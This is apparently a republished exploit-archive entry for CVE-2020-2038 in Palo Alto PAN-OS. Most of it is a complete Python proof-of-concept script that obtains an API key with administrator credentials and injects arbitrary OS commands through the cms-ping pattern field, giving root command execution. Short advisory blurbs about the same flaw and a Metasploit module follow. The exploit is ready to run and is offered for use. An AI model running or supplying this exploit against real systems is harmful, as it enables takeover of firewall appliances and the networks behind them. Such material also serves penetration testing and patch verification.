Headline
PAN-OS 10.0 Remote Code Execution
PAN-OS version 10.0 suffers from a remote code execution vulnerability.
# Exploit Title: PAN-OS 10.0 - Remote Code Execution (RCE) (Authenticated)# Date: 2022-08-13# Exploit Author: UnD3sc0n0c1d0# Software Link: https://security.paloaltonetworks.com/CVE-2020-2038# Category: Web Application# Version: <10.0.1, <9.1.4 and <9.0.10# Tested on: PAN-OS 10.0 - Parrot OS# CVE : CVE-2020-2038## Description:# An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated # administrators to execute arbitrary OS commands with root privileges.# More info: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/# Credits: Mikhail Klyuchnikov and Nikita Abramov of Positive Technologies for discovering and reporting this issue.#!/usr/bin/env python3import requestsimport urllib3import sysimport getoptimport xmltodicturllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)def banner(): print('\n###########################################################################') print('# Proof of Concept for CVE-2020-2038 #') print('# Vulnerability discovered by Mikhail Klyuchnikov and Nikita Abramov of #') print('# Positive Technologies #') print('# https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ #') print('# #') print('# Exploit by: Juampa Rodríguez (@UnD3sc0n0c1d0) #') print('###########################################################################')def exploit(target,user,password,command): apiparam = {'type': 'keygen', 'user': user, 'password': password} apiresponse = requests.get(target+'api/', params=apiparam, verify=False) xmlparse = xmltodict.parse(apiresponse.content) apikey = xmlparse['response']['result']['key'] payload = '<cms-ping><host>8.8.8.8</host><count>1</count><pattern>111<![CDATA[||'+command+'||]]></pattern></cms-ping>' parameters = {'cmd': payload, 'type': 'op', 'key': apikey} response = requests.get(target+'api', params=parameters, verify=False) print(response.text[50:-20])def usage(): print('\nusage: CVE-2020-2038.py\n\n') print('arguments:') print(' -h show this help message and exit') print(' -t target URL (ex: http://vulnerable.host/)') print(' -u target administrator user') print(' -p pasword of the defined user account') print(' -c command you want to execute on the target\n') def main(argv): if len(sys.argv) < 9: banner() usage() sys.exit() try: opts, args = getopt.getopt(argv,"ht:u:p:c:") except getopt.GetoptError: banner() usage() sys.exit() for opt, arg in opts: if opt == '-h': usage() sys.exit() if opt == '-t': target = arg if opt == '-u': user = arg if opt == '-p': password = arg if opt == '-c': command = arg banner() exploit(target,user,password,command) sys.exit()if __name__ == "__main__": try: main(sys.argv[1:]) except KeyboardInterrupt: print('Interrupted by users...') except: sys.exit()Related news
Palo Alto Networks Authenticated Remote Code Execution
This Metasploit module exploits an OS command injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts PAN-OS versions prior to 10.0.1, 9.1.4 and 9.0.10.
CVE-2020-2038: CVE-2020-2038 PAN-OS: OS command injection vulnerability in the management web interface
An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. This issue impacts: PAN-OS 9.0 versions earlier than 9.0.10; PAN-OS 9.1 versions earlier than 9.1.4; PAN-OS 10.0 versions earlier than 10.0.1.